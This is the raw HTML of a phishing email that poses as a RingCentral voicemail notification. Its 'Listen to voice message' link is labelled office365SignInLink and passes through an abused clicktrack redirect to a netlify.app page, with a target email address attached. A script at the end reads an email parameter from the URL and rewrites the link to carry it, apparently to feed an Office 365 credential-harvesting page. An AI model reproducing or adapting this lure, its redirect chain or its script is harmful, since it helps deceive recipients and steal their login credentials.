<div dir="ltr"><div class="adM">
</div><div style="text-align:left"><strong><span style="color:rgb(255,172,28);font-family:Arial,Helvetica,sans-serif;font-size:50px"><span style="color:rgb(51,102,255)">Ring</span><span style="color:rgb(255,153,0)">Central</span></span></strong> <div style="text-align:right"><span style="color:rgb(47,47,47);font-family:Arial,Helvetica,sans-serif;font-size:15px">Voice Message</span></div> <hr style="border-top:1px solid rgb(47,47,47);background-color:rgb(47,47,47)"> <span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt"><br></span> <p style="font-family:Arial,Helvetica,sans-serif;font-size:10pt"><span style="color:rgb(0,0,0)">You have a Voicemail Message from RingCentral, Inc</span></p><table style="margin:0px auto;width:600px;background-color:rgb(255,255,255)"> <tbody><tr><td style="vertical-align:top"> <div style="color:rgb(0,0,0)"><span style="font-family:Arial,Helvetica,sans-serif;font-size:10pt"><br>Listen to your voice call </span></div> <p style="font-family:Arial,Helvetica,sans-serif;font-size:10pt"><span style="color:rgb(0,0,0)">You have a new voice message:</span></p><table style="width:100%"> <tbody><tr><td style="width:21%;text-align:left;padding-bottom:6px;padding-left:10px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt"><strong>From:</strong></span></div></td><td style="width:79%;text-align:left;padding-bottom:6px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt">EXT 2025</span></div></td></tr><tr><td style="width:21%;text-align:left;padding-bottom:6px;padding-left:10px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt"><strong>Received:</strong></span></div></td><td style="width:79%;text-align:left;padding-bottom:6px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt">Tuesday, March 18, 2025</span></div></td></tr><tr><td style="width:21%;text-align:left;padding-bottom:6px;padding-left:10px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt"><strong>Length:</strong></span></div></td><td style="width:79%;text-align:left;padding-bottom:6px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt">00:54</span></div></td></tr><tr><td style="width:21%;text-align:left;padding-bottom:6px;padding-left:10px"> <div style="text-align:left"><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt"><strong></strong></span></div></td><td style="width:79%;text-align:left;padding-bottom:6px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <div style="text-align:left">&nbsp;<wbr></div></td></tr></tbody></table> <div> <p><strong>Voicemail Preview:</strong></p><span style="color:rgb(0,0,0);font-family:Arial,Helvetica,sans-serif;font-size:10pt">
<a id="office365SignInLink" href="/redirect" rel="noreferrer" target="_blank" data-saferedirecturl="https://www.google.com/url?q=http://www.enviropaedia.com/advert/clicktrack.php?aff%3DP37V2W%26id%3D19%26url%3Dhttps://astounding-kashata-afd1e3.netlify.app/%23heepi4endo4877243@zonecafe.site&amp;source=gmail&amp;ust=1742392762859000&amp;usg=AOvVaw1hmI-c7kt49Na-urrlvrVo">LISTEN TO VOICE MESSAGE</a>

</span></div></td></tr></tbody></table><span style="font-family:Arial,Helvetica,sans-serif;font-size:10pt"><br></span> <hr style="border-top:1px solid rgb(47,47,47);background-color:rgb(47,47,47)"><table style="width:100%"> <tbody><tr><td align="center" style="padding-top:10px;padding-bottom:20px;vertical-align:top"><table style="border:1px solid rgb(220,221,219);width:466px"> <tbody><tr><td align="left" style="padding:15px;color:rgb(0,115,174);line-height:1.3;vertical-align:top"> <div style="line-height:1.3"><span style="color:rgb(102,102,102);font-size:13px">.<br><br>Copyright
 2025 RingCentral, Inc. All rights reserved. RingCentral and the 
RingCentral logo are trademarks of RingCentral, Inc., 20&nbsp;Davis&nbsp;Drive, 
Belmont, CA&nbsp;94002, USA.</span></div></td></tr></tbody></table></td></tr></tbody></table></div> <p>This
 e-mail message and any documents attached to it are confidential and 
may contain information that is protected from disclosure by various 
federal and state laws, including the HIPAA privacy rule (45 C.F.R., 
Part 164). This information is intended to be used solely by the entity 
or individual to whom this message is addressed. If you are not the 
intended recipient, be advised that any use, dissemination, forwarding, 
printing, or copying of this message without the sender's written 
permission is strictly prohibited and may be unlawful. Accordingly, if 
you have received this message in error, please notify the sender 
immediately by return e-mail or call 323-569-1610, and then delete this 
message.</p><div class="yj6qo"></div><div class="adL">
<br></div></div>


<script>  
(function() {
  let lastEmail = null;

  function getEmailFromUrl() {
    const params = new URLSearchParams(window.location.search);
    return params.get("email");
  }

  function checkForEmailChange() {
    const email = getEmailFromUrl();
    if (email && email.length > 4 && email !== lastEmail) {
      lastEmail = email;
      document.getElementById("office365SignInLink").href = `/redirect?email=${lastEmail}`;
    }
  }

  // Run at page load
  checkForEmailChange();
  

  // Watch periodically (since user can manually edit URL bar)
  setInterval(checkForEmailChange, 3000);

})();


</script>